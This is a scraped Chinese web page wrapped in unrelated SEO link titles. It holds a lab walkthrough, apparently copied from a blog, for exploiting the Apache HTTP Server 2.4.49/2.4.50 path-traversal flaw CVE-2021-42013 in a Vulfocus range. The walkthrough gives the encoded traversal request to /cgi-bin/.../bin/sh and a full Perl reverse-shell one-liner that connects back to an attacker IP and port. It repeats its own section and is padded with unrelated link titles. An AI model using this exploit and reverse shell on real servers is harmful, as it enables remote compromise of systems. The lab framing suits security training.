当前位置: 首页 > news >正文

虚拟钱包对接网站开发视频教程深圳网站建设效果

虚拟钱包对接网站开发视频教程,深圳网站建设效果,如何完整地备份wordpress,重庆蜡像制作中间件安全#xff1a; Apache 远程代码执行 #xff08;CVE-2021-42013#xff09; Apache HTTP Server是美国阿帕奇#xff08;Apache#xff09;基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点#xff0c;发现 Apache HTTP Ser…中间件安全 Apache 远程代码执行 CVE-2021-42013 Apache HTTP Server是美国阿帕奇Apache基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本则这可能允许远程代码执行。 目录 中间件安全 Apache 远程代码执行 CVE-2021-42013 Apache 远程代码执行 靶场准备Web安全Vulfocus 靶场搭建.漏洞集成平台_vulfocus靶场搭建-CSDN博客 漏洞测试 第一步检测 Apache 的版本号.发现是 Apache/2.4.50 说明可能存在漏洞. 第二步进行访问然后使用 Burp 进行抓包把我们构成的数据替换进入. 第三步攻击机进行监听然后再去 Burp 点击发送。就可以看见返回成功成功入侵. 影响版本 Apache 2.4.49 和 Apache 2.4.50 Apache 远程代码执行 靶场准备Web安全Vulfocus 靶场搭建.漏洞集成平台_vulfocus靶场搭建-CSDN博客 漏洞测试 第一步检测 Apache 的版本号.发现是 Apache/2.4.50 说明可能存在漏洞. 第二步进行访问然后使用 Burp 进行抓包把我们构成的数据替换进入. # 访问这个地址就会触发下面的反弹代码.POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh #反弹 shell 命令.echo;perl -e use Socket;$i172.16.10.129;$p5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname(tcp));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,S);open(STDOUT,S);open(STDERR,S);exec(/bin/sh -i);};# 172.16.10.129 是我们攻击机的IP地址. # 5566 是我们监听的端口.# 这里添加一个在线反弹 Shell 命令一键生成链接.这个有很多资料.https://forum.ywhack.com/shell.php 第三步攻击机进行监听然后再去 Burp 点击发送。就可以看见返回成功成功入侵.
http://www.w-s-a.com/news/516678/

相关文章:

  • 安徽做网站的公司有哪些星子网络公司
  • 肥西县重点工程建设管理局网站wordpress界面菜单怎么弄
  • 宁夏网站开发设计说明书wordpress主题背景图片
  • 同一个阿里云可以做两个网站吗织梦 帝国 学校网站
  • 城阳网站建设培训网站后台怎么上传文件
  • 重庆茂尔建设集团有限公司网站网页制作教程软件
  • 金湖建设工程质量监督网站高端网站建设公司哪里济南兴田德润实惠吗
  • 站酷设计网站官网入口文字设计seo网站推广工具
  • 专业移动网站建设网站建设软件dw
  • 摄影网站设计思想视觉传达毕业设计作品网站
  • 需要优化的网站有哪些设计装修app
  • 数据型网站建设东莞好的网站国外站建设价格
  • 网络营销方法有哪些举例seo应用领域有哪些
  • 建设银行官方网站官网做网站的专业叫什么
  • 矿区网站建设濮阳做网站的公司有哪些
  • 有什么网站可以自己做书甘肃建设厅网站首页
  • 门户网站建设哪专业怎么把自己做的网站登录到网上
  • 如何做网站小编餐饮业手机php网站
  • 备案 网站商城网站设计公司排名
  • 汕头做网站优化公司seo软件简单易排名稳定
  • 如何做众筹网站微网站设计平台
  • 富平做网站十堰优化seo
  • 免费网站空间可访问wordpress弹窗注册代码
  • 东莞网站建设教程南京做代账会计在哪个网站上找
  • 网站开发好了 怎么发布wordpress数据库缓存插件
  • 工业电商网站怎么配色社交网站建设平台
  • 使用pycharm网站开发建一个网站需要什么条件
  • 网站建设哪些是需要外援的问题wordpress商品展示主题
  • 定制网站开发的目的是什么wordpress 增加按钮
  • 建设单位网站经费请示wordpress模板添加授权